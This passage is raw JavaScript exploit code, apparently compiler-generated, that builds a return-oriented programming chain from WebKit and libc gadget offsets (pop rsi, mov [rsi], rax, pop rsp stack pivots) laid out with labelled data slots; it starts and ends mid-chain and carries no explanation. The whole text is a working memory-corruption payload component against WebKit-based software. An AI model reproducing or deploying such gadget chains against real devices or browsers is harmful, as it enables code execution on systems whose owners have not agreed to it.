rax, [rax] libc_base+764760, //pop rsi ropchain+194576, //L3179 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3179: db([0, 0]); // 0x0 set_gadgets([ ropchain+194600, //L3179+24 ropchain+195952, //L3173 libc_base+764760, //pop rsi ropchain+194640, //L3180 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3180: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3182: db([72, 0]); // 0x48 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+194760, //L3185 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+194744, //L3183 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3183: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3185: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+194936, //L3188 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+194952, //L3189 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+194904, //L3186 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+194920, //L3187 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3186: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3187: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3188: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3189: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+195048, //L3191 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+195032, //L3190 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3190: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3191: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3192: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L3193: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3194: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+195248, //L3196 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3196: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+195304, //L3197 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3197: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+195440, //L3201 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+195424, //L3200 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3199: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3200: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3201: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+195560, //L3204 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+195528, //L3202 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3202: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3203: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3204: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+195696, //L3206 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+195712, //L3207 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+195680, //L3205 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3205: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3206: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3207: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+195856, //L3210 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+195872, //L3211 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+195824, //L3208 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3208: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3209: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3210: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3211: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+195944, //L3212 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3212: db([0, 0]); // 0x0 //L3173: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+196072, //L3215 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+196088, //L3216 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+196056, //L3214 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3214: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3215: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3216: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+196200, //L3218 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+196248, //L3221 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+196216, //L3219 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3218: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3219: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3220: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3221: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+196360, //L3222+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+196352, //L3222 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3222: db([0, 0]); // 0x0 set_gadgets([ ropchain+196376, //L3222+24 ropchain+200688, //L3217 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3223: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3225: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+196512, //L3228 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+196496, //L3226 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3226: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3228: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+196600, //L3229 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+196616, //L3231 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3229: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3231: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3232: db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+196696, //L3234 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3234: db([0, 0]); // 0x0 //L3233: set_gadgets([ libc_base+764760, //pop rsi ropchain+196744, //L3236 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3236: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3238: db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+196864, //L3241 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+196848, //L3239 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3239: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3241: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+197008, //L3244 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+196976, //L3242 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+196992, //L3243 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3242: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3243: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3244: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+197088, //L3245 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3245: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3247: db([64, 0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+197208, //L3250 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+197192, //L3248 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3248: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3250: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+197384, //L3253 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+197400, //L3254 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+197352, //L3251 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+197368, //L3252 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3251: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3252: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3253: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3254: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+197560, //L3258 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+197528, //L3256 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+197544, //L3257 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3255: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3256: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3257: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3258: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+197648, //L3259 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+197664, //L3260 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3259: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3260: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+197840, //L3262 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+197856, //L3263 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+197824, //L3261 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3261: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3262: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3263: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+197968, //L3265 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+198016, //L3268 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+197984, //L3266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3265: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3266: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3267: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3268: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+198128, //L3269+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+198120, //L3269 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3269: db([0, 0]); // 0x0 set_gadgets([ ropchain+198144, //L3269+24 ropchain+198160, //L3264 libc_base+782311, //pop rsp ropchain+198176, //L3270 //L3264: libc_base+782311, //pop rsp ropchain+200688, //L3271 //L3270: libc_base+764760, //pop rsi ropchain+198216, //L3272 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3272: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3274: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+198336, //L3277 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+198320, //L3275 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3275: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3277: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+198480, //L3280 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+198448, //L3278 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+198464, //L3279 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3278: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3279: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3280: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+198560, //L3281 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3281: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3283: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+198680, //L3286 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+198664, //L3284 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3284: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3286: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+198824, //L3289 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+198792, //L3287 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+198808, //L3288 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3287: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3288: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3289: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+198912, //L3291 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L3290: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L3291: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+198968, //L3292 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3292: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3294: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+199048, //L3296 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3296: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+199160, //L3297 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3297: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3299: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+199280, //L3302 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+199264, //L3300 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3300: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3302: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+199424, //L3305 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+199392, //L3303 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+199408, //L3304 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3303: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3304: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3305: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+199504, //L3306 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3306: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3307: db([32, 0]); // 0x20 set_gadget(libc_base+144605,); //pop rdi //L3308: db([32, 0]); // 0x20 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+199632, //L3310 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+199616, //L3309 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3309: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3310: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+199712, //L3311 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3311: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3313: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+199832, //L3316 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+199816, //L3314 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3314: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3316: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+199912, //L3318 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+199944, //L3320 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3318: db([0, 0]); // 0x0 set_gadgets([ libc_base+759608, //pop rax //L3319: ropchain+200072, //L3317 libc_base+144605 //pop rdi ]); //L3320: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+200048, //L3322 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+200064, //L3321 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L3322: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L3321: db([0, 0]); // 0x0 //L3317: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L3323: libc_base+764760, //pop rsi ropchain+200144, //L3324 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3324: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3326: db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+200264, //L3329 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+200248, //L3327 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3327: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3329: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+200408, //L3332 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+200376, //L3330 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+200392, //L3331 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3330: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3331: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3332: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+200496, //L3334 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L3333: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L3334: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+200552, //L3335 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3335: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3337: db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+200632, //L3339 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3339: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+196704, //L3233 //L3271: //L3217: //L3340: libc_base+764760, //pop rsi ropchain+200728, //L3341 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3341: db([0, 0]); // 0x0 